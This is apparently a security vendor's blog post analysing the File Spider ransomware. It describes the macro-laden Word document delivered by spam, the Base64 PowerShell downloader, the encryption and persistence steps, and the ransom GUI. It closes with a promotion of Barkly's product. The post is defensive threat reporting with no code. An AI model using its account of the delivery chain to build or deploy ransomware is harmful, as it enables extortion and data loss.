A new ransomware variant called File Spider is giving infected victims 96 hours to recover their encrypted files. Find out how it works and see Barkly block it.
According to researchers @malwarehunterteam and @LawrenceAbrams, File Spider is currently being distributed through malspam and is spreading in countries such as Bosnia and Herzegovina, Croatia and Serbia. The spam email begins with the subject in Croatian titled as “Potraživanje Dugovanja”, which translated to “Debt Collection” in Google Translate.
How File Spider is being delivered
Attackers are sending out spam emails that contain a Word document (BAYER_CROPSCIENCE_OFFICE_BEOGRAD_93876.doc) embedded with malicious macros.
Malicious Word document used to spread File Spider
In the event that an user clicks on the “Enable Editing” button after opening the file, the macro will run and try to download the malicious executables with the help of PowerShell.
The macro contains a Powershell script that is Base64 encoded. When executed, it will download two XOR encrypted .exe files called ‘enc.exe’ and ‘dec.exe’.
These files are decrypted, downloaded, and saved on the computer at the location ‘%AppData%\Spider’.
The encryption process
Once the macro is executed and the files have been downloaded, the script runs the two malicious executables. Enc.exe is the encryptor responsible for scanning the local drivers of the machine and encrypting targeted file types with AES-128 bit encryption. The encrypted files are then renamed with the .spider extension.
Additionally, the malware drops a file named HOW TO DECRYPT FILES.url in any folder containing encrypted files. When opened, the .url file redirects to hxxps://vid.me/embedded/CGyDc?autoplay=1&stats=1, which displays a video tutorial of how to decrypt the files.
Finally, enc.exe creates a file named ‘%UserProfile%\AppData\Roaming\Spider\5p1d3r’ and then deletes itself, thereby triggering the second file — ‘dec.exe’ — to run.
Ransom note GUI
On execution, dec.exe creates a Windows Registry entry that triggers it to be launched on startup. Following that, it displays the ransom payment instruction page with the help of a GUI.
File Spider in action
Victims are given a 96-hour deadline to pay. After that, the ransom note explains the decryption key will be “blocked” and all the victim’s files will be permanently encrypted.
Interestingly, the GUI appears to be designed to make the payment and decryption process seem less intimidating to victims. It provides instructions that walk victims through the entire payment process, from how to use the Tor Browser to how to obtain a Bitcoins, and it consists of multiple tabs that allow the victim to toggle between English and Croatian, display their ID, and visit the TOR payment site. There’s even a “Help” tab that includes a link to a video tutorial.
Unfortunately, there is currently no way of decrypting files encrypted by File Spider without paying the ransom.
Barkly blocks a File Spider attack even if a user enables macros
Delivering ransomware via spam emails and fake invoices is a well-established (yet still very effective) tactic. Attackers know there will always be a portion of users who will fall for this trick, and they know it takes time for security vendors to update their protection to cover new variants.
Barkly, on the other hand, blocks new ransomware like File Spider automatically, without any updates necessary. Not only does it prevent the ransomware payload from executing, it prevents the macro embedded in the Word document from executing, thereby stopping the attack before the payloads can even touch the machine. As a result, no information is encrypted and no damage is incurred.
Barkly provides defense in depth against the File Spider attack by blocking it at multiple stages